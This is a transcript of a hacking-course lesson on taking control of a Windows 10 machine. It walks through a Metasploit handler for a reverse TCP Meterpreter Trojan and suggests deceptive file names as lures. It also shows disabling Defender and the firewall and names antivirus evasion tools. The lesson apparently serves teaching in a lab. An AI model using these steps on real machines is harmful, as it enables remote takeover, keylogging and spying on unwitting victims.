[00:00:03] Welcome to Hacking Windows 10: Command and Control phase. Before we get into commanding, controlling, or taking over control of a Windows 10 machine through the malware that we created in the previous section, let's do a quick recap of that attack phase, because that's what we're going to need to do every time we want to create a new virus from a new IP address.

[00:00:27] So what we did in the last section was we created an executable file using msfvenom to create a reverse TCP Meterpreter virus. So we created what we call a remote access Trojan, a piece of malware that, when the person runs it on their machine (because we named it something like some cool name, "Fortnite All Skins" or "Important PDF dot exe"), as soon as they run that file on their PC, they're going to do a reverse TCP, or a call back, to my Kali Linux box, and my Kali Linux box will be able to take control of a Meterpreter, a Metasploit interpreter, remote shell that will give me full access to that Windows computer. So we did that with these four commands. Go back to the previous section if you need to create this Trojan.

[00:01:23] Then on our Kali Linux box, we needed to listen for the exploit to call back. So our windows/meterpreter/reverse_tcp needs a handler, a listener running on this Kali Linux box to listen for incoming connections. And we can use just three or four commands to make that possible: use exploit/multi/handler, set the payload, and then set the local host to your Kali IP address. You just have to tell it what IP address to listen for, and then run the exploit with the command exploit -j -z.

[00:01:55] So we're going to check in here. I have let it sit between lessons for just a few minutes, so my Meterpreter session closed. That means my Windows computer is no longer communicating. And in fact, you can see in my Downloads folder, Windows Defender started back up. So I'd need to reinfect this machine, but I'm going to run those four steps just so that you can see them one more time.

[00:02:18] So if I press Enter, and I'll use Ctrl+L to clear the screen, you can see that I'm already using the exploit/multi/handler. So if I just use my up arrow, you can see these four important commands: use exploit/multi/handler, anytime. This is a great thing to point out. Anytime we want to reuse this same remote access Trojan (so I created it in the last section and I'm going to use it right now), but I still might lose a connection with that Windows box every now and then, or I might send it to a new host machine on the network that I'm doing penetration testing for. And so I need to run this part. The virus itself can stay the same as long as your IP address stays the same on Kali. But you need to run these four commands inside Meterpreter, inside our Metasploit framework.

[00:03:11] In fact, let's go ahead and show how we would reconnect if you're coming back to this fresh or if you're infecting a new machine on your network. First we run the Metasploit Framework console. So that's msfconsole. Or you can come up to your Kali box here, come down to Exploitation Tools and find the Metasploit Framework. msfconsole takes just a moment to get up and running. Once Metasploit opens up, we just need to say use exploit/multi/handler. And we can pop back to our screen here. There we go. We can say use exploit/multi/handler. We need to set the payload to match that Meterpreter reverse TCP Trojan that we have on our other machine. I'll Ctrl+L. So we did the use exploit/multi/handler. It remembers our last few commands from the last time we logged in, so that's a really nice thing, to be able to just scroll back through those. Set the payload to windows/meterpreter/reverse_tcp. And then we need to set the LHOST, the local host parameter, so I can double-check with ip a that my address is still tendo dot nine dot seven on this Kali box. You need to make sure you set your local host to the correct one.

[00:04:33] And the last command that we need is just exploit. So you can run exploit -j -z, exploit X. Those are options to background multiple sessions. If we want to, we can just say exploit, and we are listening at that point, actively, for connections from Windows.

[00:04:50] So over here on our Windows box, we probably want to do two quick things. We'll turn off that virus protection; I'm sure it started back up. Virus & threat protection settings, we can open that. Every now and then it will automatically start back up. Go to our Manage settings. We'll make sure that Real-time protection is turned off. And we might want to add an exclusion, and I've added our Documents folder. So this time when I get into that Windows machine, I'm actually going to upload another copy of this virus to that Documents folder, and Windows shouldn't close it out. And I'm going to double-check here that my Windows firewall is off. This command: netsh advfirewall set allprofiles state off.

[00:05:33] Now, there are ways that we can get around antivirus using Veil-Evasion or some of the other tools to encode our exploit. And there are ways that you can mess with the Windows firewall or get packets out using a commonly open port like secure shell, so it makes it look like you're just surfing for a web page. But what we're doing right now is just to make it a little easier for this first command and control experience.

[00:06:01] With those few things in place, I should be able to download my Fortnite All Skins one more time. Save it. Open the folder. And then double-click to run that executable. And it says, hey, this may be an unrecognized app, but if you click More info, you can run anyway. And you can see we have started a Meterpreter session. And if I say help, Meterpreter will give me dozens of commands that I can run on this Windows host that is infected.

[00:06:40] When we come back in the next section, we're going to add the next lesson. We're going to see how to take command and control. We'll be able to do everything from upload and download files, look for web cameras, webcams attached to the computer. We'll be able to sniff keystrokes. Just about everything that you've ever feared or seen in a movie, we'll show you that most of it is real. You're going to see why you never want to download and run a file from a suspicious source. We'll see you in the next lesson.